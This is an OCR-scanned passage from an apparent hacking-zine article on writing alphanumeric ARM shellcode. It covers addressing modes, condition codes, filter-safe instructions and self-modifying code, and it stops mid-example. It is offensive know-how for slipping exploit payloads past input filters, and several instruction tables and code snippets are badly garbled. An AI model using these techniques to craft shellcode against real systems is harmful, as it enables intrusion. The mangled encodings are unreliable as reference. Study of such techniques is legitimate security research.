right by a shift_imm. 

6. <Rm>, LSR <Rs> A register Rm is used as argument that is shifted 
right by a second register Rs. 

7. <Rm>, ASR #<shift_imm> A register, which is arithmetically 
shifted right by a shift_imm. 

8. <Rm>, ASR <Rs> A register, which is arithmetically shifted right 
by a register. 

9. <Rm>, ROR #<shift_imm> A register, which is rotated right by a 
shift_imm. 
10. <Rm>, ROR <Rs> A register, which is rotated right by a register. 
11. <Rm>, RRX A register which is rotated right by one bit, with the 
carry flag replacing the free bit. The carry flag is then replaced 
with the bit which was rotated out. 


----[ 1.2.1 Addressing modes for load/store word or unsigned byte 


This is the general syntax for a load or store instruction: 
LDR{<cond>}{B}{T} <Rd>, addressing_mode 

For example: 

LDRPLB r3, [r3, #-48] 


Where addressing_mode is one of the following 6 possibilities. For 
the loads and stores with translation (e.g. LDRBT), only the last 3 
addressing modes are possible. If an exclamation mark is specified 
at the end of the first 3 addressing modes (e.g. for addressing 
mode 1, [<Rn>, #+/-<imm_12>]!), then the calculated address is 
written back to Rn. 


1. [<Rn>, #+/-<imm_12>]<!> Rn is the base address of the memory 
location where Rd will be stored. Optionally a 12 bit immediate can 
be used as offset. This offset is then added to the base address to 
calculate the address to write to. 

2. [<Rn>, +/-<Rm]<!> Rn is the base address of the memory location 
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where Rd will be stored and Rm will be used as offset for Rn. 

3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!> Rn is the base address, 
with Rm as offset. The Rm register is shifted by applying the <shift> 
operation with a <shift_imm> as argument. <shift> is one of LSL, LSR, 
ASR, ROR or RRX. 


The following three addressing modes are essentially the same as the 
above 3 addressing modes, except that they are post-indexed. That 
means that Rn is used as the memory location for the load or store. 
The calculation is done afterwards and written back into Rn. 


4. [<Rn>], #+/-<imm_12> 
5. [<Rn>], +/-<Rm> 
6. [<Rn>], +/-<Rm>, <shift> #<shift_imm> 


----[ 1.2.2 Addressing modes for load/store multiple 
The general instruction syntax for multiple loads and stores looks 
like this: 

LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>{%*} 

For example: 

LDMPLFA r5!, {r0, rl, r2, r6, xr8, lr} 


Addressing modes are one of the following 4 possibilities: 


1. IA —- Increment after In this addressing mode, Rn will be used as 
a base address and the first memory location to read or write from. 
The subsequent addresses will be calculated by incrementing the 

previous address with 4. 


2. IB Increment before In this addressing mode, Rn will be used as 
the base address. The first memory location to read or write from is 
the base address + 4. Subsequent addresses will also be calculated 


by incrementing the previous address with 4. 

3. DA - Decrement after Rn is used as the base address, from that 
register, the amount of registers multiplied by 4 is subtracted from 
this base address. Then 4 is added to this address. This is used as 
the first memory location to read or write from. Subsequent 
addresses are calculated by incrementing the previous address 

with 4. 

4. DB Decrement before Rn is used as the base address, from that 
register, the amount of registers multiplied by 4 is subtracted from 
this base address. This is used as the first memory location to read 
or write from. Subsequent addresses are calculated by incrementing 
the previous address with 4. 


----[{ 1.3 Conditional Execution 


One of the features of the ARM processor is that it supports 
conditional execution of instructions. This means that the 
programmer can choose whether instructions will be executed or not, 
depending on the value of one of the different status flags. This 
has practical use to write, for instance, short if structures ina 
more compact manner. Almost all ARM instructions support conditional 
execution. 


The conditional execution of an instruction is represented by adding 
a suffix to the name of the instruction that denotes in which 
circumstances it will be executed. Without this suffix, the 
instruction will always be executed. 


As a short example, consider the following C fragment: 


if (err != 0) 

printf("An error has occurred! Errorcode = %i\n", err); 
else 

printf ("Everything is ok!\n"); 
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GCC compiles the above code to: 


cmp rl, #0 
beq .L4 
ldr rO, .L9 
bl printf 
b .L8 

~L4: 
ldr r0, .L9+4 
bl puts 

-L8: 


With conditional execution, it could be rewritten as: 


cmp rl, #0 
ldrne £0, <H9 
bine printf 
ldreq r0O, .L9+4 
bleq puts 
The ’ne’ suffix means that the instruction will only be executed if 


the contents of, in this case, Rl is not equal to 0. Similarly, the 
‘eq’ suffix means that the instructions will be executed if the 
contents of Rl is equal to 0. 


----[ 1.4 Example Instructions 


ARM instructions are grouped into a number of categories, and each 
category has a similar bit layout. For illustration purposes, we 
will list and discuss some of these groups here. This list is not 
meant to be exhaustive or complete. 


The first group of instructions are called ’data processing 
instructions’. This group covers a broad range of operations, which 
includes basic arithmetic and bitwise operations. Data processing 
instructions can be called with two registers as operands, or with a 
register and an immediate value. An example of each of these options 
is show below. 


31 28 27 26 25 24 21 20 19 16 15 12 11 7 6 5 A-SeQ 


cond O| O| Olopcode| S Rn Rd |shift amount|/shift|0| Rm 


Example: SUBPL r6, pc, r5, ror #2 
0101 0 0 0 0010 0 1111 0110 00010 11 0 0101 


31 28 27 26 25 24 21 2019 1615 12 11 8 7 0 


cond O| O| Llopcode| S Rn Rd rotate immediate 


Example: SUBPL r3, rl, #56 
0101 0 0 1 0010 0 0001 0011 0000 00111000 


A second set of important instructions, are the instructions used to 
load bytes from the memory into registers, and to store the result 
of calculations back into the memory. In our shellcode, we will 
typically call them with an immediate offset as operand. 


31 28 27 26 25 24 23 22 21 20 19 1615 12 11 0 


cond QO} 1| O| Pl UJ WI BI] L Rn Rd immediate 


Example: LDRMIB r3, [pc, -48] 
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0100 01032101 01 1111 0011 000000110000 


An interesting alternative to loading and storing registers one at a 
time, is to use the ’load/store multiple’ instructions. The 
instructions in this group all load or store multiple registers at 
once. Bits 15 to 0 hold which registers will be operated on. 


31 28 27 26 25 24 23 22 21 20 19 1615 0 


cond 1/ O| O} P| UI S| WI] L Rn register list 


Example: STMMIFD r5, {r0, r3, r4, r6, r8, 1r}%* 
0100 1001010 0 0101 0100000101011001 


The groups described in this section are only a small subset of the 
different instruction categories. However, these four groups are the 
most important ones in the context of this article. 


----[{ 1.5 The Thumb Instruction Set 


Thumb mode is a mode in which the ARM processor can be set by 
changing the T bit of the CPSR register to 1. In this mode, the 
processor will use 16 bit instructions, which allows for better code 
density. Only T variants of the ARM processor support this mode 

(e.g. ARM4T), however as of ARMv6 Thumb support is mandatory. 
Instructions executed in 32 bit mode are called ARM instructions, 
while instructions executed in 16 bit mode are called Thumb 
instructions. Since instructions are only 2 bytes large in Thumb mode, 
it is easier to satisfy the alphanumeric constraints for instructions. 
To this end, we discuss how to get into Thumb mode from ARM mode in 
our shellcode. While our shellcode can run with only ARM instructions, 
writing code in Thumb mode is more convenient and smaller, resulting 
in less instructions and more compact shellcode. For programs already 
running in Thumb mode, we discuss a way of going back to ARM mode. 
Unlike ARM instructions, Thumb instructions do not support conditional 
execution. 


Given the fact that we can easily switch from ARM to Thumb and back 
and that ARM mode can do everything that we need, even if no Thumb 
mode is available, we achieve the broadest possible compatibility in 
our shellcode. 


--[ 2.- Alphanumeric shellcode 


----[ 2.0 Alphanumeric bit patterns 


A common problem for exploit writers is that their shellcode has to 
survive one or more byte transformations, before triggering the 
actual buffer overflow. These transformations could for instance be 
text encoding conversions, but could also be related to parsing or 
input validation. In most cases, alphanumeric bytes are likely to 
get through unmodified. Therefore, having shellcode with only 
alphanumeric instructions is sometimes necessary and often 
preferred. 


An alphanumeric instruction is an instruction where each of the four 
bytes of the instruction is either an upper or lower case letter, or 
a number. In particular, the bit patterns of these bytes must always 
conform to the following constraints: 

— Bit 7 must be set to 0 

- Bit 6 or 5 must be set to 1 
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- If bit 5 is set, but bit 6 isn’t, then bit 4 must also be set 


These constraints do not eliminate all non-alphanumeric characters, 
but they can be used as a rule of thumb to quickly dismiss most of 
the invalid bytes. Each instruction will have to be checked whether 
its bit pattern follows these conditions and under which 
circumstances. 


A potential problem for exploit writers is to get the return address 
to also be alphanumeric. This is not further discussed in this 
article as it strongly depends from situation to situation. 


—---[ 2.1 Addressing modes 


In this section we will describe which addressing modes we can use 
that will ensure that our shellcode is alphanumeric. 


----[ 2.1.0 Addressing modes for data processing 


1. #immediate 
11 8 7 ) 


rotate imm_8 


Since we can fully control the value of imm_8, we can ensure that it 
is alphanumeric. 


2. <Rm> 
1110 9 8 7 6 5 4 3 0 


O| O| Ol Of O| O| O] O Rm 


Since bits 6 and 5 are both 0, this type of addressing mode can not 
be used in alphanumeric shellcode. 


3. <Rm>, LSL #<shift_imm> 
11 Ue ibe Be 43 0 


shift_imm O0| O| O Rm 


As in addressing mode 2, bits 6 and 5 are 0, so it can not be 
represented alphanumerically. 


4. <Rm>, LSL <Rs> 
11 BG sO OS. 274-3 0 


Rs | O| O| O| 1 Rm 


Again, bits 6 and 5 are 0, so this addressing mode can not be used. 


5. <Rm>, LSR #<shift_imm> 
11 De GOS &B.» 4. 3 0 


shift_imm O| 1| 0 Rm 


Since bit 6 is 0, bits 5 and 4 must both be one. Only bit 5 is 
one, we can not represent this addressing mode alphanumerically. 


6. <Rm>, LSR <Rs> 
aa 8 7 6 S 43 0 


Rs J -Os[0s]4 Ma. ah Rm 


Bit 6 is 0, but since bits 5 and 4 are both set to 1, we can use 
this addressing mode in our alphanumeric shellcode. Register Rm 
must be less than R1O. 
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7. <Rm>, ASR #<shift_imm> 
11 7 6 5 4 3 0 


shift_imm 2. [)<Qs), 0 Rm 


Since bit 6 is set to 1, the only restriction on this addressing 
mode is that Rm can not be RO. 


8. <Rm>, ASR <Rs> 
11 8 7 6 5 4 3 0 


Rs | O| 1] O| 1 Rm 


This bit pattern is alphanumeric and allows any register to be used 
as Rm. 


9. <Rm>, ROR #<shift_imm> 
11 qj. 84.3 0 


shift_imm Tif) Al <0. Rm 


Like addressing mode 8, this pattern is alphanumeric and any register 
can be used as Rm. 


10. <Rm>, ROR <Rs> 
11 8 7 6 5 4 3 0 


Rs | O| 1] 1] 2 Rm 


Since bits 6, 5 and 4 are set to 1, Rm must be smaller than R11. 


<Rm>, RRX 
11 10 9 8 7 6 S43 0 


O| O| O| O| Of 1] 1] O Rm 


This bit pattern is alphanumeric and any register can be used as Rm. 


----[ 2.1.1 Addressing modes for load/store word or unsigned byte 


1. [<Rn>, #+/-<imm_12>]<!> 


imm_12 


Since we can fully control the value of imm_12, we can ensure that 
it is alphanumeric. 


2. [<Rn>, +/-<Rm>]<!> 
1110 9 8 7 6 5 4 3 0 


O| O| O| Ol O}| O}| OO} O Rm 


This addressing mode can not be represented alphanumerically. 


3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!> 
11 TOs, “52 383 0 


shift_imm |shift]| 0 Rm 


-— If shift is LSL, then bits 6 and 5 are 0. This is not 
alphanumeric. 
-— If shift is LSR, then bit 6 is 0 and bit 5 is 1. But since bit 4 
stays 0, it is not alphanumeric. 

-— If shift is ASR, then bit 6 is 1 and bit 5 is 0. This means that 
it is alphanumeric as long as Rm is not RO. 

- If shift is ROR or RRX, then bits 6 and 5 will be 1, which is 
alphanumeric, regardless of the register used as Rm. 
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The other post-indexing addressing modes discussed above have 
essentially the same bit layout for the last 12 bytes. They only 
differ in that these modes will unset bit 24 in the load or store 
instruction. 


-—---[ 2.1.2 Addressing modes for load/store multiple 


The increment addressing modes will set bit 23 in the load or store 
instruction, while the decrement modes will unset bit 23. If bit 23 
is set, then the instruction can not be represented 
alphanumerically. So only the decrement addressing mode can be used 
in alphanumeric shellcode. 


----[ 2.2 Conditional Execution 


Because the condition code of an instruction is encoded in the most 
Significant bits of the fourth byte of the instruction (bits 31-28), 
the value of the condition code has a direct impact on the 
alphanumeric properties of the instruction. As a result, only a 
limited set of condition codes can be used in alphanumeric 
shellcode. The table below lists all the condition codes and their 
corresponding bit pattern: 


[bitpattern] [name] [description] 
0000 EQ Equal 
0001 NE Not equal 
0010 CS/HS Carry set/unsigned higher or same 
0011 CC/LO Carry clear/unsigned lower 
0100 MI Minus/negative 
0101 PL Plus/positive or zero 
0110 AVS) Overflow 
0111 VC No overflow 
1000 HI Unsigned higher 
1001 LS Unsigned lower or same 
1010 GE Signed greater than or equal 
1011 LT Signed less than 
1100 GT Signed greater than 
1101 E Signed less than or equal 
1110 AL Always (unconditional) - 
TAv (used for other purposes) 
| | 
bit3l bit28 


Remember that the most significant bit of a byte should always be 
set to 0 in order to be alphanumeric, so this excludes the last 

eight condition codes. In addition, the resulting byte must be at 
least 0x30, so this excludes the first three condition codes too. 


Unfortunately, ’AL’ is one of the codes that cannot be used in 
alphanumeric shellcode. This means that all ARM instructions must be 
executed conditionally. In this article, we choose PL and MI as the 
two condition codes that we will use. They are mutually exclusive, 
so we can always ensure that an instruction gets executed by simply 
adding the same instruction twice to the shellcode, once with the PL 
suffix and once with the MI suffix. 


----[ 2.3 The Instruction List 


In our list of instructions, we make a distinction between SZ/SO 
(should be zero/should be one) and IZ/1IO (is zero/is one). We do this 
because the ARM reference manual specifies that specific bits must 

be set to 0 or 1 and others "Should be" set to 0 or 1 (defined as SBZ 
or SBO in the manual). However, on our test processor if we set a bit 
marked as "should be" to something else, the processor throws an 
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undefined instruction exception. As such, we’ve considered should be 
and must be to be equivalent for our discussion, but we note the 
difference should this behavior be different in other processors 
(Since this would allow us to use many more instructions). 


The table below lists all the instructions present in ARMv6. For 

each instruction, we’ve checked some simple constraints that may not 
be broken in order for the instruction to be alphanumeric. The main 
focus of this table is the high order bits of the second byte of the 
instruction (bits 23 to 20). The reason that only the high order bits 
of this byte are included, is because the high order bits of the 
first byte are set by the condition flags, and the high order bits 

of the third and fourth byte are often set by the operands of the 
instruction. When the table contains the value ’d’ for a bit, it 
means that the value of this bit depends on specific settings. 


The final column contains a list of things that disqualify the 
instruction for being used in alphanumeric shellcode. 
Disqualification criteria are that at least one of the four bytes of 
the instruction is either always too high to be alphanumeric, or 

too low. In this column, the following conventions are used: 


- ‘IO’ is used to indicate that one or more bits is always 1 
- ‘TZ’ is used to indicate that one or more bits is always 0 
- 'SO’ is used to indicate that one or more bits should be 1 
-— 'SZ’ is used to indicate that one or more bits should be 0 
instruction|version |23|22|/21|20|disqualifiers 

ADC 1 |0 {1 |d |I0O: 23 

ADD Fe (OM, [OF [dk [LO 23 

AND 0 |0 |0 |d |IZ: 23-21 

B, BL d |d |d jd 

BIC 1 |1 [0 |d |IO: 23 

BKPT 5+ O [Oo [Or Os: SL. 2a 22; 20 

BLX (1) 5+ ad fd |d Ta |LO: 32 

BLX (2) 5+ 0 |0 0 |SO: 15, IZ: 22, 20 

BX 4T, 5+ 0 |0 OQ: LOR Ty SOm TS. “ELA 225. 20 
BXJ 5TEJ, 6+/0 [0 |1 |0 |SO: 15, IZ: 22, 20, 6, 4 
CDP d |d |d jd 

CLZ 5+ 0 {1 OQ |IZ: 7-5 

CMN O |1 |1 |1 |S2Z: 15-13 

CMP 0 |1 |0 |1 |S2Z: 15-13 

CPS 6+ 0 |0 |0 |0 |SZ: 15-13, IZ 22-20 

CPY 6+ 1 |0 OF PERE 225.020; F=S5. 10.23 
EOR 0 {0 |1 |d 

LDC d ld ld 

LDM (1) d |0 |d 

LDM (2) d |1 |0 

LDM (3) d |1 |d TOs, 15 

LDR dad |0 |d 

LDRB d |1 |d 

LDRBT QO {1 {1 [1 

LDRD 5TE+ d |d |d [0 

LDRE 6+ 1 |0 |0 TOT 237 7 

LDRH d |d |d TOs: 7 

LDRSB A+ d |d fd EOs= 77 

LDRSH 4+ d ld fd LO3 7 

LDRT Ar [Q'ty eb 

MCR d |d |d |0 

MCRR 5TE+ 0 |1 |0 |0 

MLA 0 |0 |1 |d |1I0: 7 

MOV 1 |0 |1 |d |I0O: 23 

MRC d |d |d {1 

MRRC 5TE+ QO |1 |0 {1 

MRS 0 |d |0 |0 |SZ: 7-0 

MSR 0 |d |1 |0 |SO: 15 

MUL 0 {0 |0 |d |10: 7 


PKHBT 
PKHTB 
PLD 


QADD 
QADD16 
QADD8 
QADDSUBX 
QDADD 
QDSUB 
QSUB 
QSUB16 
QSUB8 
QSUBADDX 
REV 
REV16 
REVSH 
RFE 


D16 
D8 
DSUBX 


END 
DD16 
DD8 
DDSUBX 
UB16 
UB8 
UBADDX 
LA<x><y> 
LAD 


nnn BS SD AE 


<EgK 


<x><y> 
ALD 
LAW<y> 


A 
iA 
A 


2 


cs 
E 
n 
we) 


< L 


<EE 


ULW<x><y> 
USD 
SRS 
SSAT 
SSAT16 
SSUB16 
SSUB8 
SSUBADDX 
STC 
STM 
STM 


2 


Wed 


eae 
HE 
eal 


E 


Bf 


DNDADAA A DAD UW UIU OD AD OD Us- U1 D OD 


DUDA AVD AD AAD A 
i 
t 


ADDADDAAD UDA UI 
i 
t 


NDDDDDAAD VWI 
1 
t 


EXP 
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LOS 
EO: 
LOS 
IO: 
IO: 


QArPrRPRPE 
FOOOF 
pe ae a 

roo oO. 


LZ: 
IZ: 
IZ: 
IZ: 


IZ: 
IZ: 
IZ: 
IZ: 
IO: 
IO: 
IO: 


DOWDVCOCOCCOCCO0CO 


QO. | 


TO: 
IZ: 
IZ: 
nA 
IO: 
IO: 
SZ: 
LZ 
LOs 


2. O-Ove © @ +t 


TO: 


IO: 
LZ 
EO-.8 
LOS 


OXOr OVO. OO OOOO FO OrO RF Or On OOO Olek & Oo OO 


oO | 


aA 
IZ: 


LO: 
IO: 
IZ: 
SZ: 
IO: 
IZ: 
IZ: 
SZ: 
IO: 
LOS 
IZ: 
IZ: 
IZ: 


Oo 


aot 


IZ: 


IZ: 


IO: 
LOS 
EO 
IZ: 


OQ; O03 -Or 6 OF ©. 05. Or O30; (OF Or Oe AO ©: Our! OOO 2 Or'O: ©.) :@: OF. OrO (Or OO OO Or @. ES: O-GQ7P Gi EY PAO ©. On @: OFS OO Oro © 
Oo 


fo) 
RBAADDDOCDOCODOOHHEHOQDADOQDOOHHEH COCO ODOOHRHHEHEHHOOC EG: 


OF Ee Os Ova A Or OO O22 O- Or @ 1 
(OP > wl aie © Fa > a O Fan as © am @ Fan > an @ han @ Fe > es a> 


23 

23 

23 

23 

LS 
22-21 
22, 20 
22, 20, 
22% (20 
225: 20 
227 20 
22, 20, 
22, 20 
23 

235: 
23-1 
14-13, 
23 
22-21 
22-21, 
22-21 
23 

23 
14-13, 
6-5 

7 

7 

Ty. Lt 
22-21 
23g 

7 

22% 20, 
22-21 
7 

15 
22-21, 
1:5; “LO? 
23 

22, 20, 
22-21, 
14-13, 
23 

23 
22-21 
22-21, 
22-21 
22, 20 
22, 20 
7 

7 

7 

22, 20 


12 
IO: 7 
LO 7 
6-5 
EO. 
IZ: 22-21, 
22-21 
LOSS 2 “7 
POS PACS: 
7 
SZ: 14-13, 
TOs" VARS. 
6-5 
TOs °F 
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SWP 2a, 3+ 
SWPB 2a, 3+ 


fo) 


fo) 
een ene) 


ODOOOCOOCOCOCCOCCOF OO 
oe) 


i 1 1 f L 
t t t t FSF 
2 OOO: it 


UBADDX 


DDDADAADA WDA DA 


AL 
AL 


UQADD16 
UQADD8 
UQADDSUBX 
UQSUB16 
UQSUB8 
UQOSUBADDX 
USAD8 
USADA8 
USAT 
USAT16 
USUB16 
USUB8 
USUBADDX 
UXTAB 
UXTAB16 
UXTAH 
UXTB 
UXTB16 
UXTH 


oe) 
oe) 


CADCOCOCOOaAA CO! 


Re CE BRE OO: BBR RF :}::0'O.. OnOr-O (heh © OC: OO: OO. Onr@: OOO OPPs eH ee: 
oe) 


DNDDADANDADAADAAVAAAIAAVDIAVNA VANDA ADDO 
i 
t 


FO EOF OS (Ort 
fo) 


IZ: 
LO: 
LOS 
IO: 
LOS 
IO: 
LO: 
LO 
SZ: 
IZ: 
IZ: 
IO: 


IZ: 
LO:3 


TOs 


IO: 
IO: 
TO: 
IZ: 
IO: 


IO: 


TO 
IO: 
IO: 
IO: 


IO: 


EO’ 
IO: 
IO: 
IO: 
LO 
IO: 


22-21, SZ: 14-13 


23; 15; 12: .6-5 
23, IZ: 6-5 


From the list of 147 instructions that are present in the latest 


revision of the ARM documentation, 


we will now remove all 


instructions that require a specific ARM architecture version and 
all the instructions that we have disqualified based on whether or 
not they have bit patterns which are incompatible with alphanumeric 


characters. 


This leaves us with 18 instructions, 
manual: B/BL, CDP, EOR, LDC, LDM(1), 
MCR, MRC, RSB, STM(2), STRB, STRBT, 


as listed in the reference 
LDM(2), LDR, LDRB, LDRBT, LDRT, 
SUB, SWI. 


There are a few instructions listed here that are of limited use to 


us though: 


- B/BL: the Branch instruction 


is of limited use to us in most 


cases: the last 24 bits of this instruction are taken and 


then shifted left two positions 


(because instructions must always 


start at a multiple of 4). The result is then added to the 
program counter and execution will then continue at that location. 
To make this offset alphanumeric, we would have to jump at least 


12MB from our current location, 


this limits the usefulness of this 


instruction since we will not always be able to control memory that 
is at least 12MB from our shellcode. 

- CDP: is used to tell the coprocessor to do some kind of data 
processing. Since we can not be sure about which coprocessors 
may be available or not on a specific platform, we discard this 
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instruction as well. 

- LDC: the load coprocessor instruction loads data from a 
consecutive range of memory addresses into a coprocessor. 

— MCR/MRC: move to and from coprocessor register to and from ARM 
registers. While this instruction could be useful for caching 
purposes (more on this later), it is a privileged instruction 
before ARMv6. 


We are now left with 13 instructions: EOR, LDM(1), LDM(2), LDR, 
LDRB, LDRBT, LDRT, RSB, STM, STRB, STRBT, SUB, SWI. We now group 
together the instructions that have the same basic functionality 

but that only differ in the details. For instance, LDR loads a word 
from memory into a register whereas LDRB loads a byte into the least 
Significant bytes of a register. We get the following: 

— EOR: Exclusive OR 

- LDM (LDM(1), LDM(2)): Load multiple registers from a consecutive 
memory locations 

—- LDR (LDR, LDRB, LDRBT, LDRT): Load value from memory 

nto a register 

TM: Store multiple registers to consecutive memory locations 
R (STRB, STRBT): Store a register to memory 

UB (SUB, RSB): Subtract 

—- SWI: Software Interrupt a.k.a. do a system call 


4 


| 
NW WNP: 


Unfortunately, the instructions in the above list are not always 
alphanumeric. Depending on which operands are used, these functions 
may still generate non-alphanumeric characters. Hence, som 
additional constraints must be specified for each function. Below, 
we discuss these constraints for the instructions in the groups. 


— EOR: Syntax: EOR{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond O| O| IT] O| O| O| 1] S Rn Rd shifter_operand 


In order for the second byte to be alphanumeric, the S bit must be 
set to 1. If this bit is set to 0, the resulting value would be 
less than 47, which is not alphanumeric. Rn can also not be a 
register higher than R9. Since Rd is encoded in the first four bits 
of the third byte, it may not start with a 1. This means that only 
the low registers can be used. In addition, register RO to R2 can 
not be used, because this would generate a byte that is too 

low to be alphanumeric. The shifter operand must be tweaked, such 
that its most significant four bytes generate valid alphanumeric 
characters in combination with Rd. The eight least significant 
bits are, of course, also significant as they fully determine the 
fourth byte of the instruction. Details about the shifter operand 
can be found in the ARM architecture reference manual. 


- LDM(1): Syntax: LDM{<cond>}<addressing_mode> <Rn>{!}, <registers> 
31 28 27 26 25 24 23 22 21 20 19 1615 0 
cond 1/ O| O| P| UI O| Wi 1 Rn register list 
LDM (2): Syntax: LDM{<cond>}<addressing_mode> <Rn>, 


<registers_without_pc>* 


31 28 27 26 25 24 23 22 21 20 19 1615 14 0 


cond Lil Ooe OT Po Ue Be Od 2 Rn O| register list 


[The list of registers that is loaded into memory is stored in the 
last two bytes of the instructions. As a result, not any list of 
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registers can be used. In particular, for the low registers, 

R7 can never be used. R6 or R5 must be used, and if R6 is not used, 
R4 must be used. The same goes for the high registers. 
Additionally, the U bit must be set to 0 and the W bit to 1, to 
ensure that the second byte of the instruction is alphanumeric. For 
Rn, registers RO to R9 can be used with LDM(1), and RO to R10 can 
be used with LDM(2). 


- LDR: Syntax: LDR{<cond>} <Rd>, <addressing_mode> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond O| 1| IJ] Pl UJ O| WI] 1 Rn Rd addr_mode 


LDRB: Syntax: LDR{<cond>}B <Rd>, <addressing_mode> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond O| 1| IJ] Pl UJ 1| Wi 1 Rn Rd addr_mode 


LDRBT: Syntax: LDR{<cond>}BT <Rd>, <post_indexed_addressing_mode> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond Oo) SE Dee Oe We Ae | Rn Rd addr_mode 


LDRT: Syntax: LDR{<cond>}T <Rd>, <post_indexed_addressing_mode> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond Ol els Tse OF. Ue, Oo). Le Rn Rd addr_mode 


The details of the addressing mode are described in the ARM 

reference manual and will not be repeated here for brevity’s sake. 
However, the addressing mode must be specified in a way such that 

the fourth byte of the instruction is alphanumeric, and the least 
significant four bits of the third byte generate a valid character in 
combination with Rd. Rd cannot be one of the high registers, and 
cannot be RO-R2. The U bit must also be 0. 


—- STM: Syntax: STM{<cond>}<addressing_mode> <Rn>, <registers>%* 


SL 28> 27 26. 25° 24 23) 22°21 2:0) V9" M6. 15 0 


cond 1/ O| O| P| UI 1] Ol O Rn register list 


STRB: Syntax: STR{<cond>}B <Rd>, <addressing_mode> 


31 28° 27 26- 25° 24 23: 22.21 20°19. 16. 15 12°11 0 


cond O| 1| IJ] Pl UJ 1| WI O Rn Rd addr_mode 


STRBT: Syntax: STR{<cond>}BT <Rd>, <post_indexed_addressing_mode> 


31.28 27) 26 25 24 23°22 24. 20. 19 Ve 15 22°11 0 


cond Ol 2 Taf Oh We rac) Ase 0 Rn Rd addr_mode 


The structure of STM is very similar to the structure of the LDM 
operation, and the structure of STRB(T) is very similar to LDRB(T). 


Hence, comparable constraints apply. The only difference is that 
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other values for Rn must be used in order to generate an alphanumeric 
character for the third byte of the instruction. 


— SUB: Syntax: SUB{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond O| O| IT] O|] O| 11 O| S Rn Rd shifter_operand 


RSB: Syntax: RSB{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 


31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 


cond O| O| IT] OJ] O| 11 1] S Rn Rd shifter_operand 


To get the second byte of the instruction to be alphanumeric, Rn 
and the S bit must be set accordingly. In addition, Rd cannot be 
one of the high registers, or RO-R2. As with the previous 
instructions, we refer you to the ARM architecture reference manual 
for a detailed instruction of the shifter operand. 


-— SWI: Syntax: SWI{<cond>} <immed_24> 


31 28 27 26 25 24 23 0 


cond Ty sd | dsl ( <2 immed_24 


As will become clear further in the article, it was essential for 
us that the first byte of the SWI call is alphanumeric. 
Fortunately, this can be accomplished by using one of the condition 
codes discussed in the previous section. The other thr bytes ar 
fully determined by the immediate value that is passed as the 
operand of the SWI instruction. 


----[ 2.4 Getting a known value in a register 


When our shellcode starts executing, we are faced with a problem: 
We do not know which values the registers contain. So we must place 
our own value in a register, however we don’t have any traditional 
instructions for doing this. We can’t use MOV because that is not 
alphanumeric. So we must make do with our remaining instructions. 
If we look at our arithmetic instructions, we can’t EOR or SUB 

a register with/from itself to get a 0 into a register as using 

3 registers as arguments is not alphanumeric. We could EOR or SUB 
with an immediate, but we don’t know the values in the registers 

so we can’t give an appropriate immediate which will return the 
expected value. 

Given that these are our only arithmetic instructions, we can’t 
arithmetically get a known value into a register. So our approach 
has been to use LDR. Since we know which code we’re writing, we can 
use our shellcode as data and load a byte from the shellcode into a 
register. 


This is done as follows: 
SUB r3, pc, #48 
LDRB r3, [xr3, #-48] 


PC will always point to our shellcode, however we can’t directly 
access it in an LDR instruction as this would result in 
non-alphanumeric code. So we copy PC to R3 by subtracting 48 from 
PC. Then we use R3 in our LDRB instruction to load a known byte from 
our shellcode into R3 (we use an immediate offset to ensure that the 
last byte of the instruction is alphanumeric). Once this is done we 
can use R3 as the base register for loading values into other 
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registers. Subtracting 48 from R3 will give us 0, subtracting 49 
will give us -1, performing an exclusing or with a known value will 
give us another known value, etc. 


----[ 2.5 Writing to RO-R2 


One of the constraints, mentioned in section 2.3 on most functions 
that have an Rd operand, is that registers RO to R2 cannot be used 
as destination register. The reason is that the destination register 
is encoded in the four most significant bits of the third byte of an 
operation. If these bits are set to the value 0, 1 or 2, this would 
generate a byte that is not alphanumerical. 


On ARM processors, registers RO to R3 are used to transfer 
parameters to function calls. If the function has more than 4 
parameters, the additional parameters are pushed to the stack. This 
poses a problem for us, because we will need to populate registers 
RO to R3 in our shellcode, in order to pass arguments to functions 
and system calls. However, it’s not easy to write to the contents of 
these registers, because most operations do not support having RO-R2 
as a destination register. 


There is, however, one operation that we can use to write to the 
thr lowest registers, without generating non-alphanumeric 
instructions. The LDM instruction loads values from the stack into 
multiple registers. It encodes the list of registers it needs to 
write to in the last two bytes of the instruction. Hence, if bits 0 
to 2 are set, registers RO to R2 will be used to write data to. In 
order to get the bytes of the instruction to become alphanumeric, we 
have to add some other registers to the list. In the example 
shellcode, we will use registers R3 to R7 to do our calculations, 
store the results to the stack, and then load the results in RO to 
R2 with the LDM instruction. 


Thumb mode doesn’t suffer from this problem, because the resulting 
register is encoded differently. 


----[ 2.6 Self-modifying Code 


With the instructions that remain after discarding all 
non-alphanumeric bytes, it’s pretty hard to write interesting 
shellcode. There’s only limited support for arithmetic operations, 
which makes it difficult to do the calculations that are necessary 
to make system calls. In addition, there’s no branch instruction 
either, making loops impossible. So it seems that we are not even 
Turing complete. 


An interesting option would be to switch from the ARM to the Thumb 
instruction set. Since thumb instructions are shorter, it is likely 
that more instructions are available for this instruction set. 
However, in order to go from ARM to Thumb mode, we need the BX 
al 
p 


nstruction, which executes a branch and an optional exchange of 
rocessor state. This instruction is, however, not alphanumeric. 


Another possibility is to write self-modifying code. The basic idea 
is to compute and write non-alphanumeric instructions to memory, 
using only alphanumeric instructions. Then, when the desired code is 
written in memory, simply jump to the instructions to execute them. 


Let’s take a look at an example. To keep this simple, we consider 
here non-alphanumeric shellcode. Only null bytes are not allowed. 
Imagine you want to execute the instruction: 


mov r0, #0 


The resulting bytes for this instruction are O0xe3a00000. Since there 


12.txt Wed Apr 26 09:43:46 2017 18 


are two null bytes in this instruction, we will either need another 
instruction or self-modifying code. In this example, we will use 
self-modifying code: 


ldrh Cle. OG, 6] 
eor cl, #384 
strh rl, [pc, -2] 

